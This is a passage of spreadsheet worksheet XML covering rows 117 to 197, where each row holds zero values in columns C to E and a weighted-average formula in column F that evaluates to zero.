        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="118" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A118" s="41"/>
      <c r="B118" s="45"/>
      <c r="C118" s="14">
        <v>0</v>
      </c>
      <c r="D118" s="14">
        <v>0</v>
      </c>
      <c r="E118" s="14">
        <v>0</v>
      </c>
      <c r="F118" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="119" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A119" s="41"/>
      <c r="B119" s="45"/>
      <c r="C119" s="14">
        <v>0</v>
      </c>
      <c r="D119" s="14">
        <v>0</v>
      </c>
      <c r="E119" s="14">
        <v>0</v>
      </c>
      <c r="F119" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="120" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A120" s="41"/>
      <c r="B120" s="45"/>
      <c r="C120" s="14">
        <v>0</v>
      </c>
      <c r="D120" s="14">
        <v>0</v>
      </c>
      <c r="E120" s="14">
        <v>0</v>
      </c>
      <c r="F120" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="121" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A121" s="41"/>
      <c r="B121" s="45"/>
      <c r="C121" s="14">
        <v>0</v>
      </c>
      <c r="D121" s="14">
        <v>0</v>
      </c>
      <c r="E121" s="14">
        <v>0</v>
      </c>
      <c r="F121" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="122" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A122" s="41"/>
      <c r="B122" s="45"/>
      <c r="C122" s="14">
        <v>0</v>
      </c>
      <c r="D122" s="14">
        <v>0</v>
      </c>
      <c r="E122" s="14">
        <v>0</v>
      </c>
      <c r="F122" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="123" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A123" s="41"/>
      <c r="B123" s="45"/>
      <c r="C123" s="14">
        <v>0</v>
      </c>
      <c r="D123" s="14">
        <v>0</v>
      </c>
      <c r="E123" s="14">
        <v>0</v>
      </c>
      <c r="F123" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="124" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A124" s="41"/>
      <c r="B124" s="45"/>
      <c r="C124" s="14">
        <v>0</v>
      </c>
      <c r="D124" s="14">
        <v>0</v>
      </c>
      <c r="E124" s="14">
        <v>0</v>
      </c>
      <c r="F124" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="125" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A125" s="41"/>
      <c r="B125" s="45"/>
      <c r="C125" s="14">
        <v>0</v>
      </c>
      <c r="D125" s="14">
        <v>0</v>
      </c>
      <c r="E125" s="14">
        <v>0</v>
      </c>
      <c r="F125" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="126" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A126" s="41"/>
      <c r="B126" s="45"/>
      <c r="C126" s="14">
        <v>0</v>
      </c>
      <c r="D126" s="14">
        <v>0</v>
      </c>
      <c r="E126" s="14">
        <v>0</v>
      </c>
      <c r="F126" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="127" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A127" s="41"/>
      <c r="B127" s="45"/>
      <c r="C127" s="14">
        <v>0</v>
      </c>
      <c r="D127" s="14">
        <v>0</v>
      </c>
      <c r="E127" s="14">
        <v>0</v>
      </c>
      <c r="F127" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="128" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A128" s="41"/>
      <c r="B128" s="45"/>
      <c r="C128" s="14">
        <v>0</v>
      </c>
      <c r="D128" s="14">
        <v>0</v>
      </c>
      <c r="E128" s="14">
        <v>0</v>
      </c>
      <c r="F128" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="129" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A129" s="41"/>
      <c r="B129" s="45"/>
      <c r="C129" s="14">
        <v>0</v>
      </c>
      <c r="D129" s="14">
        <v>0</v>
      </c>
      <c r="E129" s="14">
        <v>0</v>
      </c>
      <c r="F129" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="130" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A130" s="41"/>
      <c r="B130" s="45"/>
      <c r="C130" s="14">
        <v>0</v>
      </c>
      <c r="D130" s="14">
        <v>0</v>
      </c>
      <c r="E130" s="14">
        <v>0</v>
      </c>
      <c r="F130" s="32">
        <f t="shared" ref="F130:F193" si="2">((C130*2)+D130+(E130*2))/5</f>
        <v>0</v>
      </c>
    </row>
    <row r="131" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A131" s="41"/>
      <c r="B131" s="45"/>
      <c r="C131" s="14">
        <v>0</v>
      </c>
      <c r="D131" s="14">
        <v>0</v>
      </c>
      <c r="E131" s="14">
        <v>0</v>
      </c>
      <c r="F131" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
    </row>
    <row r="132" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A132" s="41"/>
      <c r="B132" s="45"/>
      <c r="C132" s="14">
        <v>0</v>
      </c>
      <c r="D132" s="14">
        <v>0</v>
      </c>
      <c r="E132" s="14">
        <v>0</v>
      </c>
      <c r="F132" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
    </row>
    <row r="133" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A133" s="41"/>
      <c r="B133" s="45"/>
      <c r="C133" s="14">
        <v>0</v>
      </c>
      <c r="D133" s="14">
        <v>0</v>
      </c>
      <c r="E133" s="14">
        <v>0</v>
      </c>
      <c r="F133" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
    </row>
    <row r="134" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A134" s="41"/>
      <c r="B134" s="45"/>
      <c r="C134" s="14">
        <v>0</v>
      </c>
      <c r="D134" s="14">
        <v>0</v>
      </c>
      <c r="E134" s="14">
        <v>0</v>
      </c>
      <c r="F134" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
    </row>
    <row r="135" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A135" s="41"/>
      <c r="B135" s="45"/>
      <c r="C135" s="14">
        <v>0</v>
      </c>
      <c r="D135" s="14">
        <v>0</v>
      </c>
      <c r="E135" s="14">
        <v>0</v>
      </c>
      <c r="F135" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
    </row>
    <row r="136" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A136" s="41"/>
      <c r="B136" s="45"/>
      <c r="C136" s="14">
        <v>0</v>
      </c>
      <c r="D136" s="14">
        <v>0</v>
      </c>
      <c r="E136" s="14">
        <v>0</v>
      </c>
      <c r="F136" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
    </row>
    <row r="137" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A137" s="41"/>
      <c r="B137" s="45"/>
      <c r="C137" s="14">
        <v>0</v>
      </c>
      <c r="D137" s="14">
        <v>0</v>
      </c>
      <c r="E137" s="14">
        <v>0</v>
      </c>
      <c r="F137" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
    </row>
    <row r="138" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A138" s="41"/>
      <c r="B138" s="45"/>
      <c r="C138" s="14">
        <v>0</v>
      </c>
      <c r="D138" s="14">
        <v>0</v>
      </c>
      <c r="E138" s="14">
        <v>0</v>
      </c>
      <c r="F138" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
    </row>
    <row r="139" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A139" s="41"/>
      <c r="B139" s="45"/>
      <c r="C139" s="14">
        <v>0</v>
      </c>
      <c r="D139" s="14">
        <v>0</v>
      </c>
      <c r="E139" s="14">
        <v>0</v>
      </c>
      <c r="F139" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
    </row>
    <row r="140" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A140" s="41"/>
      <c r="B140" s="45"/>
      <c r="C140" s="14">
        <v>0</v>
      </c>
      <c r="D140" s="14">
        <v>0</v>
      </c>
      <c r="E140" s="14">
        <v>0</v>
      </c>
      <c r="F140" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
    </row>
    <row r="141" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A141" s="41"/>
      <c r="B141" s="45"/>
      <c r="C141" s="14">
        <v>0</v>
      </c>
      <c r="D141" s="14">
        <v>0</v>
      </c>
      <c r="E141" s="14">
        <v>0</v>
      </c>
      <c r="F141" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
    </row>
    <row r="142" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A142" s="41"/>
      <c r="B142" s="45"/>
      <c r="C142" s="14">
        <v>0</v>
      </c>
      <c r="D142" s="14">
        <v>0</v>
      </c>
      <c r="E142" s="14">
        <v>0</v>
      </c>
      <c r="F142" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
    </row>
    <row r="143" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A143" s="41"/>
      <c r="B143" s="45"/>
      <c r="C143" s="14">
        <v>0</v>
      </c>
      <c r="D143" s="14">
        <v>0</v>
      </c>
      <c r="E143" s="14">
        <v>0</v>
      </c>
      <c r="F143" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
    </row>
    <row r="144" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A144" s="41"/>
      <c r="B144" s="45"/>
      <c r="C144" s="14">
        <v>0</v>
      </c>
      <c r="D144" s="14">
        <v>0</v>
      </c>
      <c r="E144" s="14">
        <v>0</v>
      </c>
      <c r="F144" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
    </row>
    <row r="145" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A145" s="41"/>
      <c r="B145" s="45"/>
      <c r="C145" s="14">
        <v>0</v>
      </c>
      <c r="D145" s="14">
        <v>0</v>
      </c>
      <c r="E145" s="14">
        <v>0</v>
      </c>
      <c r="F145" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
    </row>
    <row r="146" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A146" s="41"/>
      <c r="B146" s="45"/>
      <c r="C146" s="14">
        <v>0</v>
      </c>
      <c r="D146" s="14">
        <v>0</v>
      </c>
      <c r="E146" s="14">
        <v>0</v>
      </c>
      <c r="F146" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
    </row>
    <row r="147" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A147" s="41"/>
      <c r="B147" s="45"/>
      <c r="C147" s="14">
        <v>0</v>
      </c>
      <c r="D147" s="14">
        <v>0</v>
      </c>
      <c r="E147" s="14">
        <v>0</v>
      </c>
      <c r="F147" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
    </row>
    <row r="148" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A148" s="41"/>
      <c r="B148" s="45"/>
      <c r="C148" s="14">
        <v>0</v>
      </c>
      <c r="D148" s="14">
        <v>0</v>
      </c>
      <c r="E148" s="14">
        <v>0</v>
      </c>
      <c r="F148" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
    </row>
    <row r="149" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A149" s="41"/>
      <c r="B149" s="45"/>
      <c r="C149" s="14">
        <v>0</v>
      </c>
      <c r="D149" s="14">
        <v>0</v>
      </c>
      <c r="E149" s="14">
        <v>0</v>
      </c>
      <c r="F149" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
    </row>
    <row r="150" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A150" s="41"/>
      <c r="B150" s="45"/>
      <c r="C150" s="14">
        <v>0</v>
      </c>
      <c r="D150" s="14">
        <v>0</v>
      </c>
      <c r="E150" s="14">
        <v>0</v>
      </c>
      <c r="F150" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
    </row>
    <row r="151" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A151" s="41"/>
      <c r="B151" s="45"/>
      <c r="C151" s="14">
        <v>0</v>
      </c>
      <c r="D151" s="14">
        <v>0</v>
      </c>
      <c r="E151" s="14">
        <v>0</v>
      </c>
      <c r="F151" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
    </row>
    <row r="152" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A152" s="41"/>
      <c r="B152" s="45"/>
      <c r="C152" s="14">
        <v>0</v>
      </c>
      <c r="D152" s="14">
        <v>0</v>
      </c>
      <c r="E152" s="14">
        <v>0</v>
      </c>
      <c r="F152" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
    </row>
    <row r="153" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A153" s="41"/>
      <c r="B153" s="45"/>
      <c r="C153" s="14">
        <v>0</v>
      </c>
      <c r="D153" s="14">
        <v>0</v>
      </c>
      <c r="E153" s="14">
        <v>0</v>
      </c>
      <c r="F153" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
    </row>
    <row r="154" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A154" s="41"/>
      <c r="B154" s="45"/>
      <c r="C154" s="14">
        <v>0</v>
      </c>
      <c r="D154" s="14">
        <v>0</v>
      </c>
      <c r="E154" s="14">
        <v>0</v>
      </c>
      <c r="F154" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
    </row>
    <row r="155" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A155" s="41"/>
      <c r="B155" s="45"/>
      <c r="C155" s="14">
        <v>0</v>
      </c>
      <c r="D155" s="14">
        <v>0</v>
      </c>
      <c r="E155" s="14">
        <v>0</v>
      </c>
      <c r="F155" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
    </row>
    <row r="156" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A156" s="41"/>
      <c r="B156" s="45"/>
      <c r="C156" s="14">
        <v>0</v>
      </c>
      <c r="D156" s="14">
        <v>0</v>
      </c>
      <c r="E156" s="14">
        <v>0</v>
      </c>
      <c r="F156" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
    </row>
    <row r="157" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A157" s="41"/>
      <c r="B157" s="45"/>
      <c r="C157" s="14">
        <v>0</v>
      </c>
      <c r="D157" s="14">
        <v>0</v>
      </c>
      <c r="E157" s="14">
        <v>0</v>
      </c>
      <c r="F157" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
    </row>
    <row r="158" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A158" s="41"/>
      <c r="B158" s="45"/>
      <c r="C158" s="14">
        <v>0</v>
      </c>
      <c r="D158" s="14">
        <v>0</v>
      </c>
      <c r="E158" s="14">
        <v>0</v>
      </c>
      <c r="F158" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
    </row>
    <row r="159" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A159" s="41"/>
      <c r="B159" s="45"/>
      <c r="C159" s="14">
        <v>0</v>
      </c>
      <c r="D159" s="14">
        <v>0</v>
      </c>
      <c r="E159" s="14">
        <v>0</v>
      </c>
      <c r="F159" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
    </row>
    <row r="160" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A160" s="41"/>
      <c r="B160" s="45"/>
      <c r="C160" s="14">
        <v>0</v>
      </c>
      <c r="D160" s="14">
        <v>0</v>
      </c>
      <c r="E160" s="14">
        <v>0</v>
      </c>
      <c r="F160" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
    </row>
    <row r="161" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A161" s="41"/>
      <c r="B161" s="45"/>
      <c r="C161" s="14">
        <v>0</v>
      </c>
      <c r="D161" s="14">
        <v>0</v>
      </c>
      <c r="E161" s="14">
        <v>0</v>
      </c>
      <c r="F161" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
    </row>
    <row r="162" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A162" s="41"/>
      <c r="B162" s="45"/>
      <c r="C162" s="14">
        <v>0</v>
      </c>
      <c r="D162" s="14">
        <v>0</v>
      </c>
      <c r="E162" s="14">
        <v>0</v>
      </c>
      <c r="F162" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
    </row>
    <row r="163" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A163" s="41"/>
      <c r="B163" s="45"/>
      <c r="C163" s="14">
        <v>0</v>
      </c>
      <c r="D163" s="14">
        <v>0</v>
      </c>
      <c r="E163" s="14">
        <v>0</v>
      </c>
      <c r="F163" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
    </row>
    <row r="164" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A164" s="41"/>
      <c r="B164" s="45"/>
      <c r="C164" s="14">
        <v>0</v>
      </c>
      <c r="D164" s="14">
        <v>0</v>
      </c>
      <c r="E164" s="14">
        <v>0</v>
      </c>
      <c r="F164" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
    </row>
    <row r="165" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A165" s="41"/>
      <c r="B165" s="45"/>
      <c r="C165" s="14">
        <v>0</v>
      </c>
      <c r="D165" s="14">
        <v>0</v>
      </c>
      <c r="E165" s="14">
        <v>0</v>
      </c>
      <c r="F165" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
    </row>
    <row r="166" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A166" s="41"/>
      <c r="B166" s="45"/>
      <c r="C166" s="14">
        <v>0</v>
      </c>
      <c r="D166" s="14">
        <v>0</v>
      </c>
      <c r="E166" s="14">
        <v>0</v>
      </c>
      <c r="F166" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
    </row>
    <row r="167" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A167" s="41"/>
      <c r="B167" s="45"/>
      <c r="C167" s="14">
        <v>0</v>
      </c>
      <c r="D167" s="14">
        <v>0</v>
      </c>
      <c r="E167" s="14">
        <v>0</v>
      </c>
      <c r="F167" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
    </row>
    <row r="168" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A168" s="41"/>
      <c r="B168" s="45"/>
      <c r="C168" s="14">
        <v>0</v>
      </c>
      <c r="D168" s="14">
        <v>0</v>
      </c>
      <c r="E168" s="14">
        <v>0</v>
      </c>
      <c r="F168" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
    </row>
    <row r="169" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A169" s="41"/>
      <c r="B169" s="45"/>
      <c r="C169" s="14">
        <v>0</v>
      </c>
      <c r="D169" s="14">
        <v>0</v>
      </c>
      <c r="E169" s="14">
        <v>0</v>
      </c>
      <c r="F169" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
    </row>
    <row r="170" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A170" s="41"/>
      <c r="B170" s="45"/>
      <c r="C170" s="14">
        <v>0</v>
      </c>
      <c r="D170" s="14">
        <v>0</v>
      </c>
      <c r="E170" s="14">
        <v>0</v>
      </c>
      <c r="F170" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
    </row>
    <row r="171" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A171" s="41"/>
      <c r="B171" s="45"/>
      <c r="C171" s="14">
        <v>0</v>
      </c>
      <c r="D171" s="14">
        <v>0</v>
      </c>
      <c r="E171" s="14">
        <v>0</v>
      </c>
      <c r="F171" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
    </row>
    <row r="172" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A172" s="41"/>
      <c r="B172" s="45"/>
      <c r="C172" s="14">
        <v>0</v>
      </c>
      <c r="D172" s="14">
        <v>0</v>
      </c>
      <c r="E172" s="14">
        <v>0</v>
      </c>
      <c r="F172" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
    </row>
    <row r="173" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A173" s="41"/>
      <c r="B173" s="45"/>
      <c r="C173" s="14">
        <v>0</v>
      </c>
      <c r="D173" s="14">
        <v>0</v>
      </c>
      <c r="E173" s="14">
        <v>0</v>
      </c>
      <c r="F173" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
    </row>
    <row r="174" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A174" s="41"/>
      <c r="B174" s="45"/>
      <c r="C174" s="14">
        <v>0</v>
      </c>
      <c r="D174" s="14">
        <v>0</v>
      </c>
      <c r="E174" s="14">
        <v>0</v>
      </c>
      <c r="F174" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
    </row>
    <row r="175" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A175" s="41"/>
      <c r="B175" s="45"/>
      <c r="C175" s="14">
        <v>0</v>
      </c>
      <c r="D175" s="14">
        <v>0</v>
      </c>
      <c r="E175" s="14">
        <v>0</v>
      </c>
      <c r="F175" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
    </row>
    <row r="176" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A176" s="41"/>
      <c r="B176" s="45"/>
      <c r="C176" s="14">
        <v>0</v>
      </c>
      <c r="D176" s="14">
        <v>0</v>
      </c>
      <c r="E176" s="14">
        <v>0</v>
      </c>
      <c r="F176" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
    </row>
    <row r="177" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A177" s="41"/>
      <c r="B177" s="45"/>
      <c r="C177" s="14">
        <v>0</v>
      </c>
      <c r="D177" s="14">
        <v>0</v>
      </c>
      <c r="E177" s="14">
        <v>0</v>
      </c>
      <c r="F177" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
    </row>
    <row r="178" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A178" s="41"/>
      <c r="B178" s="45"/>
      <c r="C178" s="14">
        <v>0</v>
      </c>
      <c r="D178" s="14">
        <v>0</v>
      </c>
      <c r="E178" s="14">
        <v>0</v>
      </c>
      <c r="F178" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
    </row>
    <row r="179" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A179" s="41"/>
      <c r="B179" s="45"/>
      <c r="C179" s="14">
        <v>0</v>
      </c>
      <c r="D179" s="14">
        <v>0</v>
      </c>
      <c r="E179" s="14">
        <v>0</v>
      </c>
      <c r="F179" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
    </row>
    <row r="180" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A180" s="41"/>
      <c r="B180" s="45"/>
      <c r="C180" s="14">
        <v>0</v>
      </c>
      <c r="D180" s="14">
        <v>0</v>
      </c>
      <c r="E180" s="14">
        <v>0</v>
      </c>
      <c r="F180" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
    </row>
    <row r="181" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A181" s="41"/>
      <c r="B181" s="45"/>
      <c r="C181" s="14">
        <v>0</v>
      </c>
      <c r="D181" s="14">
        <v>0</v>
      </c>
      <c r="E181" s="14">
        <v>0</v>
      </c>
      <c r="F181" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
    </row>
    <row r="182" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A182" s="41"/>
      <c r="B182" s="45"/>
      <c r="C182" s="14">
        <v>0</v>
      </c>
      <c r="D182" s="14">
        <v>0</v>
      </c>
      <c r="E182" s="14">
        <v>0</v>
      </c>
      <c r="F182" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
    </row>
    <row r="183" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A183" s="41"/>
      <c r="B183" s="45"/>
      <c r="C183" s="14">
        <v>0</v>
      </c>
      <c r="D183" s="14">
        <v>0</v>
      </c>
      <c r="E183" s="14">
        <v>0</v>
      </c>
      <c r="F183" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
    </row>
    <row r="184" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A184" s="41"/>
      <c r="B184" s="45"/>
      <c r="C184" s="14">
        <v>0</v>
      </c>
      <c r="D184" s="14">
        <v>0</v>
      </c>
      <c r="E184" s="14">
        <v>0</v>
      </c>
      <c r="F184" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
    </row>
    <row r="185" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A185" s="41"/>
      <c r="B185" s="45"/>
      <c r="C185" s="14">
        <v>0</v>
      </c>
      <c r="D185" s="14">
        <v>0</v>
      </c>
      <c r="E185" s="14">
        <v>0</v>
      </c>
      <c r="F185" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
    </row>
    <row r="186" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A186" s="41"/>
      <c r="B186" s="45"/>
      <c r="C186" s="14">
        <v>0</v>
      </c>
      <c r="D186" s="14">
        <v>0</v>
      </c>
      <c r="E186" s="14">
        <v>0</v>
      </c>
      <c r="F186" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
    </row>
    <row r="187" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A187" s="41"/>
      <c r="B187" s="45"/>
      <c r="C187" s="14">
        <v>0</v>
      </c>
      <c r="D187" s="14">
        <v>0</v>
      </c>
      <c r="E187" s="14">
        <v>0</v>
      </c>
      <c r="F187" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
    </row>
    <row r="188" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A188" s="41"/>
      <c r="B188" s="45"/>
      <c r="C188" s="14">
        <v>0</v>
      </c>
      <c r="D188" s="14">
        <v>0</v>
      </c>
      <c r="E188" s="14">
        <v>0</v>
      </c>
      <c r="F188" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
    </row>
    <row r="189" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A189" s="41"/>
      <c r="B189" s="45"/>
      <c r="C189" s="14">
        <v>0</v>
      </c>
      <c r="D189" s="14">
        <v>0</v>
      </c>
      <c r="E189" s="14">
        <v>0</v>
      </c>
      <c r="F189" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
    </row>
    <row r="190" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A190" s="41"/>
      <c r="B190" s="45"/>
      <c r="C190" s="14">
        <v>0</v>
      </c>
      <c r="D190" s="14">
        <v>0</v>
      </c>
      <c r="E190" s="14">
        <v>0</v>
      </c>
      <c r="F190" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
    </row>
    <row r="191" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A191" s="41"/>
      <c r="B191" s="45"/>
      <c r="C191" s="14">
        <v>0</v>
      </c>
      <c r="D191" s="14">
        <v>0</v>
      </c>
      <c r="E191" s="14">
        <v>0</v>
      </c>
      <c r="F191" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
    </row>
    <row r="192" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A192" s="41"/>
      <c r="B192" s="45"/>
      <c r="C192" s="14">
        <v>0</v>
      </c>
      <c r="D192" s="14">
        <v>0</v>
      </c>
      <c r="E192" s="14">
        <v>0</v>
      </c>
      <c r="F192" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
    </row>
    <row r="193" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A193" s="41"/>
      <c r="B193" s="45"/>
      <c r="C193" s="14">
        <v>0</v>
      </c>
      <c r="D193" s="14">
        <v>0</v>
      </c>
      <c r="E193" s="14">
        <v>0</v>
      </c>
      <c r="F193" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
    </row>
    <row r="194" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A194" s="41"/>
      <c r="B194" s="45"/>
      <c r="C194" s="14">
        <v>0</v>
      </c>
      <c r="D194" s="14">
        <v>0</v>
      </c>
      <c r="E194" s="14">
        <v>0</v>
      </c>
      <c r="F194" s="32">
        <f t="shared" ref="F194:F245" si="3">((C194*2)+D194+(E194*2))/5</f>
        <v>0</v>
      </c>
    </row>
    <row r="195" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A195" s="41"/>
      <c r="B195" s="45"/>
      <c r="C195" s="14">
        <v>0</v>
      </c>
      <c r="D195" s="14">
        <v>0</v>
      </c>
      <c r="E195" s="14">
        <v>0</v>
      </c>
      <c r="F195" s="32">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
    </row>
    <row r="196" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A196" s="41"/>
      <c r="B196" s="45"/>
      <c r="C196" s="14">
        <v>0</v>
      </c>
      <c r="D196" s="14">
        <v>0</v>
      </c>
      <c r="E196" s="14">
        <v>0</v>
      </c>
      <c r="F196" s="32">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
    </row>
    <row r="197" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A197" s="41"/>
